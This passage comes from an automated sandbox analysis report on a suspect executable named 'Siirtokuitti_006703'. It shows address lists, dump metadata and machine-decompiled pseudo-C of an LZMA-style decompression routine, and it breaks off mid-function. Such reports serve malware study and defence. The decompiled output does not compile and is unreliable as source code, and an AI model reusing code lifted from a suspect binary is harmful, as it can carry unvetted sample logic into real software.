                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                      • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                                                                      • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                      • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E0040690B(void* __ecx) {
                                                                                                                      				void* _v8;
                                                                                                                      				void* _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v95;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				intOrPtr _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				void _v140;
                                                                                                                      				void* _v148;
                                                                                                                      				signed int _t537;
                                                                                                                      				signed int _t538;
                                                                                                                      				signed int _t572;
                                                                                                                      
                                                                                                                      				_t572 = 0x22;
                                                                                                                      				_v148 = __ecx;
                                                                                                                      				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                      				if(_v52 == 0xffffffff) {
                                                                                                                      					return 1;
                                                                                                                      				}
                                                                                                                      				while(1) {
                                                                                                                      					L3:
                                                                                                                      					_t537 = _v140;
                                                                                                                      					if(_t537 > 0x1c) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					switch( *((intOrPtr*)(_t537 * 4 +  &M0040735D))) {
                                                                                                                      						case 0:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v116 = _v116 + 1;
                                                                                                                      							_t537 =  *_v116;
                                                                                                                      							__eflags = _t537 - 0xe1;
                                                                                                                      							if(_t537 > 0xe1) {
                                                                                                                      								goto L174;
                                                                                                                      							}
                                                                                                                      							_t542 = _t537 & 0x000000ff;
                                                                                                                      							_push(0x2d);
                                                                                                                      							asm("cdq");
                                                                                                                      							_pop(_t576);
                                                                                                                      							_push(9);
                                                                                                                      							_pop(_t577);
                                                                                                                      							_t622 = _t542 / _t576;
                                                                                                                      							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                      							asm("cdq");
                                                                                                                      							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                      							_v64 = _t617;
                                                                                                                      							_v32 = (1 << _t622) - 1;
                                                                                                                      							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                      							__eflags = 0x600 - _v124;
                                                                                                                      							if(0x600 == _v124) {
                                                                                                                      								L12:
                                                                                                                      								__eflags = _t625;
                                                                                                                      								if(_t625 == 0) {
                                                                                                                      									L14:
                                                                                                                      									_v76 = _v76 & 0x00000000;
                                                                                                                      									_v68 = _v68 & 0x00000000;
                                                                                                                      									goto L17;
                                                                                                                      								} else {
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								do {
                                                                                                                      									L13:
                                                                                                                      									_t625 = _t625 - 1;
                                                                                                                      									__eflags = _t625;
                                                                                                                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                      								} while (_t625 != 0);
                                                                                                                      								goto L14;
                                                                                                                      							}
                                                                                                                      							__eflags = _v8;
                                                                                                                      							if(_v8 != 0) {
                                                                                                                      								GlobalFree(_v8);
                                                                                                                      							}
                                                                                                                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      							__eflags = _t537;
                                                                                                                      							_v8 = _t537;
                                                                                                                      							if(_t537 == 0) {
                                                                                                                      								goto L174;
                                                                                                                      							} else {
                                                                                                                      								_v124 = 0x600;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      						case 1:
                                                                                                                      							L15:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 1;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                      							_v116 = _v116 + 1;
                                                                                                                      							_t50 =  &_v76;
                                                                                                                      							 *_t50 = _v76 + 1;
                                                                                                                      							__eflags =  *_t50;
                                                                                                                      							L17:
                                                                                                                      							__eflags = _v76 - 4;
                                                                                                                      							if(_v76 < 4) {
                                                                                                                      								goto L15;
                                                                                                                      							}
                                                                                                                      							_t550 = _v68;
                                                                                                                      							__eflags = _t550 - _v120;
                                                                                                                      							if(_t550 == _v120) {
                                                                                                                      								L22:
                                                                                                                      								_v76 = 5;
                                                                                                                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							__eflags = _v12;
                                                                                                                      							_v120 = _t550;
                                                                                                                      							if(_v12 != 0) {
                                                                                                                      								GlobalFree(_v12);
                                                                                                                      							}
                                                                                                                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                      							__eflags = _t537;
                                                                                                                      							_v12 = _t537;
                                                                                                                      							if(_t537 == 0) {
                                                                                                                      								goto L174;
                                                                                                                      							} else {
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      						case 2:
                                                                                                                      							L26:
                                                                                                                      							_t557 = _v100 & _v32;
                                                                                                                      							_v136 = 6;
                                                                                                                      							_v80 = _t557;
                                                                                                                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                      							goto L135;
                                                                                                                      						case 3:
                                                                                                                      							L23:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 3;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_t72 =  &_v116;
                                                                                                                      							 *_t72 = _v116 + 1;
                                                                                                                      							__eflags =  *_t72;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							L25:
                                                                                                                      							_v76 = _v76 - 1;
                                                                                                                      							__eflags = _v76;
                                                                                                                      							if(_v76 != 0) {
                                                                                                                      								goto L23;
                                                                                                                      							}
                                                                                                                      							goto L26;
                                                                                                                      						case 4:
                                                                                                                      							L136:
                                                                                                                      							_t559 =  *_t626;
                                                                                                                      							_t610 = _t559 & 0x0000ffff;
                                                                                                                      							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                      							__eflags = _v16 - _t591;
                                                                                                                      							if(_v16 >= _t591) {
                                                                                                                      								_v20 = _v20 - _t591;
                                                                                                                      								_v16 = _v16 - _t591;
                                                                                                                      								_v68 = 1;
                                                                                                                      								_t560 = _t559 - (_t559 >> 5);
                                                                                                                      								__eflags = _t560;
                                                                                                                      								 *_t626 = _t560;
                                                                                                                      							} else {
                                                                                                                      								_v20 = _t591;
                                                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                                                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                      							}
                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                      								goto L142;
                                                                                                                      							} else {
                                                                                                                      								goto L140;
                                                                                                                      							}
                                                                                                                      						case 5:
                                                                                                                      							L140:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 5;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_t464 =  &_v116;
                                                                                                                      							 *_t464 = _v116 + 1;
                                                                                                                      							__eflags =  *_t464;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							L142:
                                                                                                                      							_t561 = _v136;
                                                                                                                      							goto L143;
                                                                                                                      						case 6:
                                                                                                                      							__edx = 0;
                                                                                                                      							__eflags = _v68;
                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								__eax = _v8;
                                                                                                                      								__ecx = _v60;
                                                                                                                      								_v56 = 1;
                                                                                                                      								_v136 = 7;
                                                                                                                      								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                      								goto L135;
                                                                                                                      							}
                                                                                                                      							__eax = _v96 & 0x000000ff;
                                                                                                                      							__esi = _v100;
                                                                                                                      							__cl = 8;
                                                                                                                      							__cl = 8 - _v64;
                                                                                                                      							__esi = _v100 & _v28;
                                                                                                                      							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                      							__ecx = _v64;
                                                                                                                      							__esi = (_v100 & _v28) << 8;
                                                                                                                      							__ecx = _v8;
                                                                                                                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                      							__eflags = _v60 - 4;
                                                                                                                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                      							if(_v60 >= 4) {
                                                                                                                      								__eflags = _v60 - 0xa;
                                                                                                                      								if(_v60 >= 0xa) {
                                                                                                                      									_t103 =  &_v60;
                                                                                                                      									 *_t103 = _v60 - 6;
                                                                                                                      									__eflags =  *_t103;
                                                                                                                      								} else {
                                                                                                                      									_v60 = _v60 - 3;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_v60 = 0;
                                                                                                                      							}
                                                                                                                      							__eflags = _v56 - __edx;
                                                                                                                      							if(_v56 == __edx) {
                                                                                                                      								__ebx = 0;
                                                                                                                      								__ebx = 1;
                                                                                                                      								goto L63;
                                                                                                                      							}
                                                                                                                      							__eax = _v24;
                                                                                                                      							__eax = _v24 - _v48;
                                                                                                                      							__eflags = __eax - _v120;
                                                                                                                      							if(__eax >= _v120) {
                                                                                                                      								__eax = __eax + _v120;
                                                                                                                      								__eflags = __eax;
                                                                                                                      							}
                                                                                                                      							__ecx = _v12;
                                                                                                                      							__ebx = 0;
                                                                                                                      							__ebx = 1;
                                                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      							goto L43;
                                                                                                                      						case 7:
                                                                                                                      							__eflags = _v68 - 1;
                                                                                                                      							if(_v68 != 1) {
                                                                                                                      								__eax = _v40;
                                                                                                                      								_v132 = 0x16;
                                                                                                                      								_v36 = _v40;
                                                                                                                      								__eax = _v44;
                                                                                                                      								_v40 = _v44;
                                                                                                                      								__eax = _v48;
                                                                                                                      								_v44 = _v48;
                                                                                                                      								__eax = 0;
                                                                                                                      								__eflags = _v60 - 7;
                                                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      								__al = __al & 0x000000fd;
                                                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      								__eax = _v8;
                                                                                                                      								__eax = _v8 + 0x664;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								_v92 = __eax;
                                                                                                                      								goto L71;
                                                                                                                      							}
                                                                                                                      							__eax = _v8;
                                                                                                                      							__ecx = _v60;
                                                                                                                      							_v136 = 8;
                                                                                                                      							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                      							goto L135;
                                                                                                                      						case 8:
                                                                                                                      							__eflags = _v68;
                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								__eax = _v8;
                                                                                                                      								__ecx = _v60;
                                                                                                                      								_v136 = 0xa;
                                                                                                                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                      							} else {
                                                                                                                      								__eax = _v60;
                                                                                                                      								__ecx = _v8;
                                                                                                                      								__eax = _v60 + 0xf;
                                                                                                                      								_v136 = 9;
                                                                                                                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                      							}
                                                                                                                      							goto L135;
                                                                                                                      						case 9:
                                                                                                                      							__eflags = _v68;
                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								goto L92;
                                                                                                                      							}
                                                                                                                      							__eflags = _v100;
                                                                                                                      							if(_v100 == 0) {
                                                                                                                      								goto L174;
                                                                                                                      							}
                                                                                                                      							__eax = 0;
                                                                                                                      							__eflags = _v60 - 7;
                                                                                                                      							_t264 = _v60 - 7 >= 0;
                                                                                                                      							__eflags = _t264;
                                                                                                                      							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                      							_v60 = _t264 + _t264 + 9;
                                                                                                                      							goto L78;
                                                                                                                      						case 0xa:
                                                                                                                      							__eflags = _v68;
                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								__eax = _v8;
                                                                                                                      								__ecx = _v60;
                                                                                                                      								_v136 = 0xb;
                                                                                                                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                      								goto L135;
                                                                                                                      							}
                                                                                                                      							__eax = _v44;
                                                                                                                      							goto L91;
                                                                                                                      						case 0xb:
                                                                                                                      							__eflags = _v68;
                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								__ecx = _v40;
                                                                                                                      								__eax = _v36;
                                                                                                                      								_v36 = _v40;
                                                                                                                      							} else {
                                                                                                                      								__eax = _v40;
                                                                                                                      							}
                                                                                                                      							__ecx = _v44;
                                                                                                                      							_v40 = _v44;
                                                                                                                      							L91:
                                                                                                                      							__ecx = _v48;
                                                                                                                      							_v48 = __eax;
                                                                                                                      							_v44 = _v48;
                                                                                                                      							L92:
                                                                                                                      							__eax = _v8;
                                                                                                                      							_v132 = 0x15;
                                                                                                                      							__eax = _v8 + 0xa68;
                                                                                                                      							_v92 = _v8 + 0xa68;
                                                                                                                      							goto L71;
                                                                                                                      						case 0xc:
                                                                                                                      							L102:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 0xc;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v116;
                                                                                                                      							__eax = _v16;
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							_t340 =  &_v116;
                                                                                                                      							 *_t340 = _v116 + 1;
                                                                                                                      							__eflags =  *_t340;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							__eax = _v48;
                                                                                                                      							goto L104;
                                                                                                                      						case 0xd:
                                                                                                                      							L39:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 0xd;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v116;
                                                                                                                      							__eax = _v16;
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							_t127 =  &_v116;
                                                                                                                      							 *_t127 = _v116 + 1;
                                                                                                                      							__eflags =  *_t127;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							L41:
                                                                                                                      							__eax = _v68;
                                                                                                                      							__eflags = _v76 - _v68;
                                                                                                                      							if(_v76 != _v68) {
                                                                                                                      								goto L50;
                                                                                                                      							}
                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                      								goto L56;
                                                                                                                      							}
                                                                                                                      							L43:
                                                                                                                      							__eax = _v95 & 0x000000ff;
                                                                                                                      							_v95 = _v95 << 1;
                                                                                                                      							__ecx = _v92;
                                                                                                                      							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                      							_v76 = __eax;
                                                                                                                      							__eax = __eax + 1;
                                                                                                                      							__eax = __eax << 8;
                                                                                                                      							__eax = __eax + __ebx;
                                                                                                                      							__esi = _v92 + __eax * 2;
                                                                                                                      							_v20 = _v20 >> 0xb;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							_v88 = __esi;
                                                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                                                      							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                      							__eflags = _v16 - __ecx;
                                                                                                                      							if(_v16 >= __ecx) {
                                                                                                                      								_v20 = _v20 - __ecx;
                                                                                                                      								_v16 = _v16 - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								_v68 = 1;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      							} else {
                                                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                                                      								_v20 = __ecx;
                                                                                                                      								0x800 = 0x800 - __edx;
                                                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                      							_v72 = __ebx;
                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                      								goto L41;
                                                                                                                      							} else {
                                                                                                                      								goto L39;
                                                                                                                      							}
                                                                                                                      						case 0xe:
                                                                                                                      							L48:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 0xe;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v116;
                                                                                                                      							__eax = _v16;
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							_t161 =  &_v116;
                                                                                                                      							 *_t161 = _v116 + 1;
                                                                                                                      							__eflags =  *_t161;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							while(1) {
                                                                                                                      								L50:
                                                                                                                      								__eflags = __ebx - 0x100;
                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eax = _v92;
                                                                                                                      								__edx = __ebx + __ebx;
                                                                                                                      								__ecx = _v20;
                                                                                                                      								__esi = __edx + __eax;
                                                                                                                      								__ecx = _v20 >> 0xb;
                                                                                                                      								__ax =  *__esi;
                                                                                                                      								_v88 = __esi;
                                                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                                                      								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                      								__eflags = _v16 - __ecx;
                                                                                                                      								if(_v16 >= __ecx) {
                                                                                                                      									_v20 = _v20 - __ecx;
                                                                                                                      									_v16 = _v16 - __ecx;
                                                                                                                      									__cx = __ax;
                                                                                                                      									__ebx = __edx + 1;
                                                                                                                      									__cx = __ax >> 5;
                                                                                                                      									__eflags = __eax;
                                                                                                                      									 *__esi = __ax;
                                                                                                                      								} else {
                                                                                                                      									_v20 = __ecx;
                                                                                                                      									0x800 = 0x800 - __edi;
                                                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      									__ebx = __ebx + __ebx;
                                                                                                                      									 *__esi = __cx;
                                                                                                                      								}
                                                                                                                      								__eflags = _v20 - 0x1000000;
                                                                                                                      								_v72 = __ebx;
                                                                                                                      								if(_v20 >= 0x1000000) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									goto L48;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L56:
                                                                                                                      							_t178 =  &_v56;
                                                                                                                      							 *_t178 = _v56 & 0x00000000;
                                                                                                                      							__eflags =  *_t178;
                                                                                                                      							goto L57;
                                                                                                                      						case 0xf:
                                                                                                                      							L60:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 0xf;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v116;
                                                                                                                      							__eax = _v16;
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							_t208 =  &_v116;
                                                                                                                      							 *_t208 = _v116 + 1;
                                                                                                                      							__eflags =  *_t208;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							L62:
                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                      								L57:
                                                                                                                      								__al = _v72;
                                                                                                                      								_v96 = _v72;
                                                                                                                      								goto L58;
                                                                                                                      							}
                                                                                                                      							L63:
                                                                                                                      							__eax = _v92;
                                                                                                                      							__edx = __ebx + __ebx;
                                                                                                                      							__ecx = _v20;
                                                                                                                      							__esi = __edx + __eax;
                                                                                                                      							__ecx = _v20 >> 0xb;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							_v88 = __esi;
                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                      							__eflags = _v16 - __ecx;
                                                                                                                      							if(_v16 >= __ecx) {
                                                                                                                      								_v20 = _v20 - __ecx;
                                                                                                                      								_v16 = _v16 - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								__ebx = __edx + 1;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      							} else {
                                                                                                                      								_v20 = __ecx;
                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                      							_v72 = __ebx;
                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                      								goto L62;
                                                                                                                      							} else {
                                                                                                                      								goto L60;
                                                                                                                      							}
                                                                                                                      						case 0x10:
                                                                                                                      							L112:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 0x10;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v116;
                                                                                                                      							__eax = _v16;
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							_t371 =  &_v116;
                                                                                                                      							 *_t371 = _v116 + 1;
                                                                                                                      							__eflags =  *_t371;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							goto L114;
                                                                                                                      						case 0x11:
                                                                                                                      							L71:
                                                                                                                      							__esi = _v92;
                                                                                                                      							_v136 = 0x12;
                                                                                                                      							goto L135;
                                                                                                                      						case 0x12:
                                                                                                                      							__eflags = _v68;
